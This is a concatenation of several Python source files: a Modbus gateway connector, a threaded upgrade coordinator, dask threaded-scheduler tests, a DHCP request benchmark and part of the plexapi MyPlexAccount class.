master_config["bytesize"] = current_config[BYTESIZE_PARAMETER] if current_config.get(
BYTESIZE_PARAMETER) is not None else self.__config.get(BYTESIZE_PARAMETER, Defaults.Bytesize)
master_config["parity"] = current_config[PARITY_PARAMETER] if current_config.get(
PARITY_PARAMETER) is not None else self.__config.get(PARITY_PARAMETER, Defaults.Parity)
master_config["strict"] = current_config[STRICT_PARAMETER] if current_config.get(
STRICT_PARAMETER) is not None else self.__config.get(STRICT_PARAMETER, True)
master_config["retries"] = current_config[RETRIES_PARAMETER] if current_config.get(
RETRIES_PARAMETER) is not None else self.__config.get(RETRIES_PARAMETER, 3)
master_config["retry_on_empty"] = current_config[RETRY_ON_EMPTY_PARAMETER] if current_config.get(
RETRY_ON_EMPTY_PARAMETER) is not None else self.__config.get(RETRY_ON_EMPTY_PARAMETER, True)
master_config["retry_on_invalid"] = current_config[RETRY_ON_INVALID_PARAMETER] if current_config.get(
RETRY_ON_INVALID_PARAMETER) is not None else self.__config.get(RETRY_ON_INVALID_PARAMETER, True)
master_config["rtu"] = ModbusRtuFramer if current_config.get(METHOD_PARAMETER) == "rtu" or (
current_config.get(METHOD_PARAMETER) is None and self.__config.get(
METHOD_PARAMETER) == "rtu") else ModbusSocketFramer
if self.__previous_master_config != master_config:
self.__previous_master_config = master_config
if current_config.get(TYPE_PARAMETER) == 'tcp' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "tcp"):
master = ModbusTcpClient(master_config["host"], master_config["port"], master_config["rtu"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"])
elif current_config.get(TYPE_PARAMETER) == 'udp' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "udp"):
master = ModbusUdpClient(master_config["host"], master_config["port"], master_config["rtu"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"])
elif current_config.get(TYPE_PARAMETER) == 'serial' or (
current_config.get(TYPE_PARAMETER) is None and self.__config.get(TYPE_PARAMETER) == "serial"):
master = ModbusSerialClient(method=master_config["method"],
port=master_config["port"],
timeout=master_config["timeout"],
retry_on_empty=master_config["retry_on_empty"],
retry_on_invalid=master_config["retry_on_invalid"],
retries=master_config["retries"],
baudrate=master_config["baudrate"],
stopbits=master_config["stopbits"],
bytesize=master_config["bytesize"],
parity=master_config["parity"],
strict=master_config["strict"])
else:
raise Exception("Invalid Modbus transport type.")
else:
master = self.__current_master
available_functions = {
1: master.read_coils,
2: master.read_discrete_inputs,
3: master.read_holding_registers,
4: master.read_input_registers,
5: master.write_coil,
6: master.write_register,
15: master.write_coils,
16: master.write_registers,
}
return master, available_functions
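# The function map above follows the standard Modbus public function codes:
# 1/2 read coils/discrete inputs, 3/4 read holding/input registers,
# 5/6 write a single coil/register, 15/16 write multiple coils/registers.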
def __stop_connections_to_masters(self):
for device in self.__devices:
if self.__devices[device].get(MASTER_PARAMETER) is not None:
self.__devices[device][MASTER_PARAMETER].close()
def __function_to_device(self, config, unit_id):
function_code = config.get(FUNCTION_CODE_PARAMETER)
result = None
if function_code in (1, 2, 3, 4):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
count=config.get(OBJECTS_COUNT_PARAMETER,
config.get("registersCount",
config.get("registerCount",
1))),
unit=unit_id)
elif function_code in (5, 6):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
value=config[PAYLOAD_PARAMETER],
unit=unit_id)
elif function_code in (15, 16):
result = self.__available_functions[function_code](address=config[ADDRESS_PARAMETER],
values=config[PAYLOAD_PARAMETER],
unit=unit_id)
else:
log.error("Unknown Modbus function with code: %i", function_code)
log.debug("With result %s", str(result))
if "Exception" in str(result):
log.exception(result)
return result
def server_side_rpc_handler(self, server_rpc_request):
try:
if server_rpc_request.get(DEVICE_SECTION_PARAMETER) is not None:
log.debug("Modbus connector received rpc request for %s with server_rpc_request: %s",
server_rpc_request[DEVICE_SECTION_PARAMETER],
server_rpc_request)
if isinstance(self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION], dict):
rpc_command_config = \
self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION].get(
server_rpc_request[DATA_PARAMETER][RPC_METHOD_PARAMETER])
if rpc_command_config is not None:
self.__process_rpc_request(server_rpc_request, rpc_command_config)
elif isinstance(self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION], list):
for rpc_command_config in \
self.__devices[server_rpc_request[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][
RPC_SECTION]:
if rpc_command_config[TAG_PARAMETER] == server_rpc_request[DATA_PARAMETER][
RPC_METHOD_PARAMETER]:
self.__process_rpc_request(server_rpc_request, rpc_command_config)
break
else:
log.error("Received rpc request, but method %s not found in config for %s.",
server_rpc_request[DATA_PARAMETER].get(RPC_METHOD_PARAMETER),
self.get_name())
self.__gateway.send_rpc_reply(server_rpc_request[DEVICE_SECTION_PARAMETER],
server_rpc_request[DATA_PARAMETER][RPC_ID_PARAMETER],
{server_rpc_request[DATA_PARAMETER][
RPC_METHOD_PARAMETER]: "METHOD NOT FOUND!"})
else:
log.debug("Received RPC to connector: %r", server_rpc_request)
except Exception as e:
log.exception(e)
def __process_rpc_request(self, content, rpc_command_config):
if rpc_command_config is not None:
rpc_command_config[UNIT_ID_PARAMETER] = \
self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER][UNIT_ID_PARAMETER]
self.__connect_to_current_master(content[DEVICE_SECTION_PARAMETER])
# if rpc_command_config.get('bit') is not None:
# rpc_command_config[FUNCTION_CODE_PARAMETER] = 6
if rpc_command_config.get(FUNCTION_CODE_PARAMETER) in (5, 6, 15, 16):
rpc_command_config[PAYLOAD_PARAMETER] = self.__devices[content[DEVICE_SECTION_PARAMETER]][
DOWNLINK_PREFIX + CONVERTER_PARAMETER].convert(
rpc_command_config, content)
response = None
try:
response = self.__function_to_device(rpc_command_config, rpc_command_config[UNIT_ID_PARAMETER])
except Exception as e:
log.exception(e)
response = e
if isinstance(response, (ReadRegistersResponseBase, ReadBitsResponseBase)):
to_converter = {
RPC_SECTION: {content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: {"data_sent": rpc_command_config,
"input_data": response}}}
response = self.__devices[content[DEVICE_SECTION_PARAMETER]][
UPLINK_PREFIX + CONVERTER_PARAMETER].convert(
config={**self.__devices[content[DEVICE_SECTION_PARAMETER]][CONFIG_SECTION_PARAMETER],
BYTE_ORDER_PARAMETER: self.__devices[content[DEVICE_SECTION_PARAMETER]][
CONFIG_SECTION_PARAMETER].get(BYTE_ORDER_PARAMETER,
self.__byte_order),
WORD_ORDER_PARAMETER: self.__devices[content[DEVICE_SECTION_PARAMETER]][
CONFIG_SECTION_PARAMETER].get(WORD_ORDER_PARAMETER,
self.__word_order)
},
data=to_converter)
log.debug("Received RPC method: %s, result: %r", content[DATA_PARAMETER][RPC_METHOD_PARAMETER],
response)
# response = {"success": response}
elif isinstance(response, (WriteMultipleRegistersResponse,
WriteMultipleCoilsResponse,
WriteSingleCoilResponse,
WriteSingleRegisterResponse)):
log.debug("Write %r", str(response))
response = {"success": True}
if content.get(RPC_ID_PARAMETER) or (
content.get(DATA_PARAMETER) is not None and content[DATA_PARAMETER].get(RPC_ID_PARAMETER)):
if isinstance(response, Exception):
self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
content[DATA_PARAMETER][RPC_ID_PARAMETER],
{content[DATA_PARAMETER][RPC_METHOD_PARAMETER]: str(response)})
else:
self.__gateway.send_rpc_reply(content[DEVICE_SECTION_PARAMETER],
content[DATA_PARAMETER][RPC_ID_PARAMETER],
response)
log.debug("%r", response)
|
upgrade_center.py | import time
import threading
from .base.event_base import EventBase
class UpgradeCenter(EventBase):
def __init__(self):
super(UpgradeCenter, self).__init__()
self.workers = {}
self.run_status = []
self.is_processing = False
self.is_error = False
self.current = 0
self.total = 0
self.data_lock = threading.Lock()
def register(self, worker):
worker_key = 'worker-' + str(len(self.workers))
worker.set_key(worker_key)
self.workers[worker_key] = {'executor': worker, 'current': 0}
self.total += worker.get_upgrade_content_size()
def start(self):
if self.is_processing:
print('upgrade is in processing...')
return False
self.is_processing = True
for worker in self.workers.values():
# start a thread to invoke the worker's work
executor = worker['executor']
thread = threading.Thread(
target=self.thread_start_worker, args=(executor,))
thread.start()
def thread_start_worker(self, executor):
executor.on('progress', self.handle_worker_progress)
executor.on('error', self.handle_worker_error)
executor.on('finish', self.handle_worker_done)
executor.work()
def handle_worker_progress(self, worker_key, current, total):
''' on single worker progress
'''
self.data_lock.acquire()
self.current = 0
self.workers[worker_key]['current'] = current
for worker in self.workers.values():
self.current += worker['current']
self.data_lock.release()
self.emit('progress', self.current, self.total)
def handle_worker_error(self, worker_key, message):
''' on worker error
'''
# notify other workers to stop the upgrade
for worker in self.workers.values():
worker['executor'].stop()
self.emit('error', message)
def handle_worker_done(self, worker_key):
''' on worker finish
should check whether all workers are done
'''
self.run_status.append(worker_key)
# print('{0} worker finished'.format(worker_key))
if len(self.run_status) == len(self.workers):
# wait briefly before emitting so earlier progress data reaches the client first
time.sleep(.5)
self.emit('finish')
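# Usage sketch (assumes a worker implementing set_key(), work(),
# get_upgrade_content_size() and the EventBase on()/emit() protocol):
# center = UpgradeCenter()
# center.register(worker)
# center.on('progress', lambda current, total: print(current, total))
# center.start()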
|
test_threaded.py | import os
import sys
import signal
import threading
from multiprocessing.pool import ThreadPool
from time import time, sleep
import pytest
import dask
from dask.compatibility import PY2
from dask.threaded import get
from dask.utils_test import inc, add
def test_get():
dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
assert get(dsk, 'w') == 4
assert get(dsk, ['w', 'z']) == (4, 2)
def test_nested_get():
dsk = {'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}
assert get(dsk, ['a', 'b']) == (3, 3)
def test_get_without_computation():
dsk = {'x': 1}
assert get(dsk, 'x') == 1
def bad(x):
raise ValueError()
def test_exceptions_rise_to_top():
dsk = {'x': 1, 'y': (bad, 'x')}
pytest.raises(ValueError, lambda: get(dsk, 'y'))
def test_reuse_pool():
pool = ThreadPool()
with dask.config.set(pool=pool):
assert get({'x': (inc, 1)}, 'x') == 2
assert get({'x': (inc, 1)}, 'x') == 2
def test_threaded_within_thread():
L = []
def f(i):
result = get({'x': (lambda: i,)}, 'x', num_workers=2)
L.append(result)
before = threading.active_count()
for i in range(20):
t = threading.Thread(target=f, args=(1,))
t.daemon = True
t.start()
t.join()
assert L == [1]
del L[:]
start = time() # wait for most threads to join
while threading.active_count() > before + 10:
sleep(0.01)
assert time() < start + 5
def test_dont_spawn_too_many_threads():
before = threading.active_count()
dsk = {('x', i): (lambda: i,) for i in range(10)}
dsk['x'] = (sum, list(dsk))
for i in range(20):
get(dsk, 'x', num_workers=4)
after = threading.active_count()
assert after <= before + 8
def test_thread_safety():
def f(x):
return 1
dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}
L = []
def test_f():
L.append(get(dsk, 'y'))
threads = []
for i in range(20):
t = threading.Thread(target=test_f)
t.daemon = True
t.start()
threads.append(t)
for thread in threads:
thread.join()
assert L == [1] * 20
@pytest.mark.xfail('xdist' in sys.modules,
reason=("This test fails intermittently when using "
"pytest-xdist (maybe)"))
def test_interrupt():
# Python 2, and Windows on both Python 2 & 3, implement `queue.get` using
# polling, which means we can raise an exception to interrupt the call to
# `get`. Python 3 on other platforms requires sending SIGINT to the main thread.
if PY2:
from thread import interrupt_main
elif os.name == 'nt':
from _thread import interrupt_main
else:
main_thread = threading.get_ident()
def interrupt_main():
signal.pthread_kill(main_thread, signal.SIGINT)
def long_task():
sleep(5)
dsk = {('x', i): (long_task,) for i in range(20)}
dsk['x'] = (len, list(dsk.keys()))
try:
interrupter = threading.Timer(0.5, interrupt_main)
interrupter.start()
start = time()
get(dsk, 'x')
except KeyboardInterrupt:
pass
except Exception:
assert False, "Failed to interrupt"
stop = time()
if stop - start > 4:
assert False, "Failed to interrupt"
|
bench.py | import logging
import socket
import threading
import time
from .proto.packet import Packet
from .proto.opttypes import OptionType
from .proto.dhcpmsg import MessageType
def sync_worker(address, on_success, on_fail, oneshot=False, macaddr=None, relay_ip=None):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 0))
sock.settimeout(1)
pkt = Packet(message_type=MessageType.REQUEST)
pkt.op = Packet.Op.REQUEST
pkt.chaddr = macaddr or 'de:12:44:4c:bb:48'
if relay_ip:
pkt.hops = 1
pkt.giaddr = relay_ip
pkt.add_option(OptionType.AgentInformation, b'\x01\x04test')
while True:
data = pkt.pack()
sent = sock.sendto(data, address)
try:
data, address = sock.recvfrom(4096)
on_success()
if oneshot:
reply = Packet.unpack_from(data)
print(reply)
except socket.timeout:
on_fail()
if oneshot:
break
def start_threaded(address, threads=1, macaddr=None, relay_ip=None):
host, port = address.split(':')
port = int(port)
success_count = 0
fail_count = 0
def inc_success():
nonlocal success_count
success_count += 1
def inc_fail():
nonlocal fail_count
fail_count += 1
for _ in range(threads):
t = threading.Thread(target=sync_worker, args=((host, port), inc_success, inc_fail, False, macaddr, relay_ip), daemon=True)
t.start()
while True:
time.sleep(1.0)
print('requests success: %s fail: %s' % (success_count, fail_count))
success_count = 0
fail_count = 0
def oneshot(address, macaddr, relay_ip):
host, port = address.split(':')
port = int(port)
sync_worker((host, port), lambda:None, lambda:None, oneshot=True, macaddr=macaddr, relay_ip=relay_ip)
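# Usage sketch (address and MAC are illustrative):
# start_threaded('127.0.0.1:67', threads=4, macaddr='de:12:44:4c:bb:48')
# oneshot('127.0.0.1:67', macaddr=None, relay_ip=None)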
|
myplex.py | # -*- coding: utf-8 -*-
import copy
import threading
import time
from xml.etree import ElementTree
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.client import PlexClient
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sonos import PlexSonosClient
from plexapi.sync import SyncItem, SyncList
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
entitlements (List<str>): List of devices you're allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (int): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
roles: (List<str>) List of account roles. Plexpass membership is listed here.
scrobbleTypes (str): Description
secure (bool): Description
subscriptionActive (bool): True if your subscription is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=1&server=1&home=1' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
OPTOUTS = 'https://plex.tv/api/v2/user/%(userUUID)s/settings/opt_outs' # get
LINK = 'https://plex.tv/api/v2/pins/link' # put
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token or CONFIG.get('auth.server_token')
self._session = session or requests.Session()
self._sonos_cache = []
self._sonos_cache_timestamp = 0
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = utils.cast(int, data.attrib.get('id'))
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = self.listAttrs(subscription, 'id', etag='feature')
self.roles = self.listAttrs(data, 'id', rtag='roles', etag='role')
self.entitlements = self.listAttrs(data, 'id', rtag='entitlements', etag='entitlement')
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name=None, clientId=None):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
clientId (str): clientIdentifier to match against.
"""
for device in self.devices():
if (name and device.name.lower() == name.lower() or device.clientIdentifier == clientId):
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def sonos_speakers(self):
if 'companions_sonos' not in self.subscriptionFeatures:
return []
t = time.time()
if t - self._sonos_cache_timestamp > 5:
self._sonos_cache_timestamp = t
data = self.query('https://sonos.plex.tv/resources')
self._sonos_cache = [PlexSonosClient(self, elem) for elem in data]
return self._sonos_cache
def sonos_speaker(self, name):
return next((x for x in self.sonos_speakers() if x.title.split("+")[0].strip() == name), None)
def sonos_speaker_by_id(self, identifier):
return next((x for x in self.sonos_speakers() if x.machineIdentifier.startswith(identifier)), None)
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objects, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objects, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objects, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
# If the user does not already exist, treat the request as new and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be updated.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objects, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
